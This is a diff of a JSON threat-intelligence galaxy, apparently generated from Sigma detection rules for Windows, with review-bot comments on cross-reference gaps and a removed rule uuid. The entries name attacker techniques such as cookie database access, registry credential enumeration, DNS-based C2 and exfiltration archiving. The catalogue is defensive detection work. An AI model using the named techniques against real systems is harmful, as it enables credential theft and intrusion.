@@ -40298,6 +51674,22 @@ "attack.t1134.003" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "value": "Impersonate Execution" }, @@ -40314,8 +51706,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" ], "tags": [ @@ -40412,9 +51804,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" ], "tags": [ 
@@ -40422,6 +51814,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "value": "Use NTFS Short Name in Image" }, @@ -40447,6 +51848,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", "value": "Renamed PowerShell" }, @@ -40471,6 +51881,15 @@ "attack.t1539" ] }, + "related": [ + { + "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", "value": "SQLite Firefox Cookie DB Access" }, @@ -40488,8 +51907,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/hexacorn/status/1448037865435320323", "https://twitter.com/Gal_B1t/status/1062971006078345217", + "https://twitter.com/hexacorn/status/1448037865435320323", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" ], "tags": [ @@ -40571,6 +51990,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "value": "InfDefaultInstall.exe .inf Execution" }, 
@@ -40588,8 +52016,8 @@ "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" ], "tags": [ @@ -40597,6 +52025,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "value": "Operator Bloopers Cobalt Strike Modules" }, @@ -40613,8 +52050,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" ], "tags": [ @@ -40622,6 +52059,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", "value": "Execution via CL_Invocation.ps1" }, 
@@ -40741,6 +52187,15 @@ "attack.t1135" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", "value": "Automated Turla Group Lateral Movement" }, @@ -40765,6 +52220,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "value": "Execute From Alternate Data Streams" }, @@ -40811,6 +52275,15 @@ "attack.t1484.001" ] }, + "related": [ + { + "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", "value": "Modify Group Policy Settings" }, @@ -40837,6 +52310,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", "value": "Execute Arbitrary Commands Using MSDT.EXE" }, @@ -40861,6 +52343,15 @@ "attack.t1552.002" ] }, + "related": [ + { + "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "value": "Enumeration for Credentials in Registry" }, 
@@ -40885,6 +52376,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "value": "Custom Class Execution via Xwizard" }, @@ -40901,10 +52401,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://twitter.com/BleepinComputer/status/1372218235949617161", "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" ], @@ -40914,6 +52414,15 @@ "attack.t1053" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", "value": "Exchange Exploitation Activity" }, 
@@ -40931,8 +52440,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" ], "tags": [ @@ -40941,6 +52450,22 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", "value": "UNC2452 PowerShell Pattern" }, @@ -40967,6 +52492,22 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4d7cda18-1b12-4e52-b45c-d28653210df8", "value": "Sysmon Driver Unload" }, 
@@ -41015,6 +52556,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "value": "Java Running with Remote Debugging" }, @@ -41056,8 +52606,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" 
@@ -41088,9 +52638,53 @@
 "attack.t1218.011"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7453575c-a747-40b9-839b-125a0aae324b",
 "value": "Unidentified Attacker November 2018"
 },
+ {
+ "description": "Detects suspicious encoded character syntax often used for defense evasion",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2020/07/09",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_powershell_obfuscation_via_utf8.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/0gtweet/status/1281103918693482496",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_obfuscation_via_utf8.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.defense_evasion",
+ "attack.t1027"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6",
+ "value": "Potential PowerShell Obfuscation Via WCHAR"
+ },
 {
 "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin",
 "meta": {
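Review bot: The re-added entry `e312efd0-35a1-407f-8439-b8d434b438a6` carries only one `related` element (`970a3432-3237-47ad-bcca-7d8cbb217736`, matching `attack.t1059.001`) although its `tags` also list the technique `attack.t1027`, so one technique tag produces no cross-reference. Elsewhere in this diff each technique tag appears to yield its own `related` element (three for the shadow-copy rule at L6685, two for the VirtualBox rule at L6687), so this looks like a gap in the technique lookup of the generator, which is not in the diff, rather than a deliberate skip; worth checking how T1027 is resolved there. Keeping the uuid stable across the removal in `@@ -39888,32 +51154,6 @@` (L6689) and this re-insertion under the new `filename` is the right call, since existing references keep resolving. The unchanged `description` ("Detects suspicious encoded character syntax …") no longer matches the new title "Potential PowerShell Obfuscation Via WCHAR" or the `_via_utf8` filename, but that text is mirrored from upstream Sigma and should be fixed there rather than in this galaxy.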
@@ -41106,8 +52700,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", + "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" ], "tags": [ @@ -41139,6 +52733,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", "value": "Use of UltraVNC Remote Access Software" }, @@ -41164,6 +52767,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "value": "Suspicious Scheduled Task Name As GUID" }, @@ -41189,6 +52801,15 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", "value": "WinRM Access with Evil-WinRM" }, 
@@ -41214,9 +52835,42 @@
 "attack.t1053.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602",
 "value": "Scheduled Task WScript VBScript"
 },
+ {
+ "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2023/01/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_appx_execution.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "f91ed517-a6ba-471d-9910-b3b4a398c0f3",
+ "value": "Suspicious Windows App Activity"
+ },
 {
 "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.",
 "meta": {
@@ -41239,6 +52893,15 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "5b80cf53-3a46-4adc-960b-05ec19348d74",
 "value": "Wscript Execution from Non C Drive"
 },
@@ -41263,6 +52926,15 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", "value": "Visual Basic Command Line Compiler Usage" }, @@ -41324,9 +52996,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" ], "tags": [ @@ -41351,8 +53023,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://h.43z.one/ipconverter/", + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" ], "tags": [ @@ -41385,6 +53057,15 @@ "attack.initial_access" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" }, 
@@ -41401,8 +53082,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/regsvr32.exe", "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://www.echotrail.io/insights/search/regsvr32.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" ], "tags": [ @@ -41410,6 +53091,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", "value": "Regsvr32 Spawning Explorer" }, @@ -41426,8 +53116,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" ], "tags": [ @@ -41436,6 +53126,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", "value": "High Integrity Sdclt Process" }, 
@@ -41452,8 +53151,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", "https://github.com/lukebaggett/dnscat2-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" ], @@ -41465,6 +53164,36 @@ "attack.t1041" ] }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" }, @@ -41490,6 +53219,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "value": "Node Process Executions" }, 
@@ -41507,8 +53252,8 @@ "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", - "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" ], "tags": [ @@ -41517,6 +53262,15 @@ "car.2016-03-002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", "value": "Suspicious WMIC Execution" }, @@ -41542,6 +53296,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "value": "Suspicious Modification Of Scheduled Tasks" }, 
@@ -41568,33 +53331,18 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b3512211-c67e-4707-bedc-66efc7848863", "value": "Potential PowerShell Downgrade Attack" }, - { - "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tracker_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", - "value": "DLL Injection with Tracker.exe" - }, { "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "meta": { @@ -41616,6 +53364,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "value": "CrackMapExec Process Patterns" }, @@ -41643,6 +53400,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", "value": "Suspicious Copy From or To System32" }, 
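Review bot: The cluster entry with uuid `148431ce-4b70-403d-8525-fcc2993f29ea` ("DLL Injection with Tracker.exe") is removed outright, and no entry carrying that uuid reappears in the visible hunks. Galaxy cluster uuids are stable identifiers that other clusters' `related` lists and MISP events may reference, so dropping the object leaves any such reference dangling. If the upstream Sigma rule was deleted or renamed, keeping the object under its uuid (for example with a deprecation marker in `meta`) or carrying the uuid over to the successor rule would preserve those links; since the file appears to be generated, this presumably needs handling in the generator rather than by hand.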
@@ -41669,6 +53435,22 @@ "attack.persistence" ] }, + "related": [ + { + "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "value": "Writing Of Malicious Files To The Fonts Folder" }, @@ -41695,6 +53477,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", "value": "Invoke-Obfuscation Via Use MSHTA" }, 
@@ -41719,9 +53510,51 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "value": "Use of LogMeIn Remote Access Software" }, + { + "description": "Detects powershell scripts that import modules from suspicious directories", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_import_module_susp_dirs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_module_susp_dirs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "value": "Import PowerShell Modules From Suspicious Directories - ProcCreation" + }, { "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", "meta": { @@ -41743,6 +53576,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "value": "Compress Data and Lock With Password for Exfiltration With WINZIP" }, 
